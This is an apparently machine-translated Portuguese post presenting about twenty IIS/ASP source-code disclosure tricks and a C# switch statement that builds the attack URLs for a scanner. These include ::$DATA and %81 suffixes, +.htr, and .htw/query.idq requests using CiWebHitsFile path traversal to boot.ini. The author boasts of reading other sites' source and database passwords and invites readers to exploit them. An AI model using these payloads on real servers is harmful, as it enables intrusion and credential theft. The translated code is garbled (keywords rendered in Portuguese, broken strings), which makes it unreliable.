Como todos sabemos, a plataforma do Windows tem muitas brechas, os patches são um após o outro, mas sempre é suficiente para compensar. Resumi os 20 métodos que conheço o código -fonte do ASP e escrevi um aplicativo em C# para digitalizar essas vulnerabilidades. Mas nos últimos dois dias, eu realmente vi o código -fonte de muitos sites, incluindo senhas de banco de dados. para o banco de dados e faça o que quiser. Primeiro, liste estes 20 métodos abaixo:
| . %81 ::DADOS %2e %2e%41sp +.htr // Longhtr .Bak CodeBRWS.asp ShowCode.asp null.htw qfullhit.htw qsumrhit.htw query.idq pesquisa/qfullhit.htw pesquisa/qsumrhit.htw iirturnh.htw .htw Traduzir: f |
Os 10 primeiros vulnerabilidades acima são adicionados diretamente ao arquivo ASP, como %81 é xxx.asp %81. : F Método não está disponível diretamente através do navegador Baixe tudo do meu site.
| Switch (this.cbomethod.SelectedIndex) { Caso 0: // Leia diretamente strRequestFile = strServer + strurl; quebrar; Caso 5: //%2e%41sp strrequestFile = strServer + strpath + strfirst + %2e %41sp; quebrar; Caso 8: // Longhtr strrequestFile = StrServer + Strurl + +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htr; quebrar; Caso 10: //codebrws.asp strrequestFile = strServer + /iissamples/exair/howitworks/codebrws.asp?source= + strurl; quebrar; Caso 11: //showcode.asp strrequestFile = strServer + /iissamples/exair/howitworks/codebrws.asp?source= + /sadc/../../../boot.ini; quebrar; Caso 12: //null.htw strrequestFile = strServer + /null.htw?ciwebhitsfile= + strurl + %20 & Cirestiction = Nenhum & cihilitEType = completo; quebrar; Caso 13: //qfullhit.htw strrequestFile = strServer + /iissosples/issamples/oop/qfullhit.htw? + CIWebhitsFile =/../../boot.ini & Cirestiction = Nenhum + & CihilitEType = completo; quebrar; Caso 14: //qsumrhit.htw strrequestFile = strServer + /iissamples/issamples/oop/qsumrhit.htw? + CIWebhitsFile =/../../boot.ini & Cirestiction = Nenhum + & CihilitEType = completo; quebrar; Caso 15: //Query.idq strrequestFile = strServer + /query.idq?citemplate=/../../boot.ini +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx; quebrar; Caso 16: //search/qfullhit.htw strrequestFile = strServer + /iissamples/exair/search/qfullhit.htw? + CIWebhitsFile =/../../boot.ini & Cirestiction = Nenhum + & CihilitEType = completo; quebrar; Caso 17: // search/qsumrhit.htw strrequestFile = strServer + /iissamples/exair/search/qsumrhit.htw? + CIWebhitsFile =/../../boot.ini & Cirestiction = Nenhum + & CihilitEType = completo; quebrar; Caso 18: //iirturnh.htw strrequestFile = strServer + /iishelp/iis/misc/iirturnh.htw? + CIWebhitsFile =/../../boot.ini & Cirestiction = Nenhum + & CihilitEType = completo; quebrar; Caso 19: //.htw strrequestFile = StrServer + Strurl +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 +%20%20%20%20%20%20%20%20%20%20%.htw? + CIWebhitsFile =/../../boot.ini & Cirestiction = Nenhum + & CihilitEType = completo; quebrar; padrão: strRequestFile = strServer + strurl + this.cbomethod.text; } |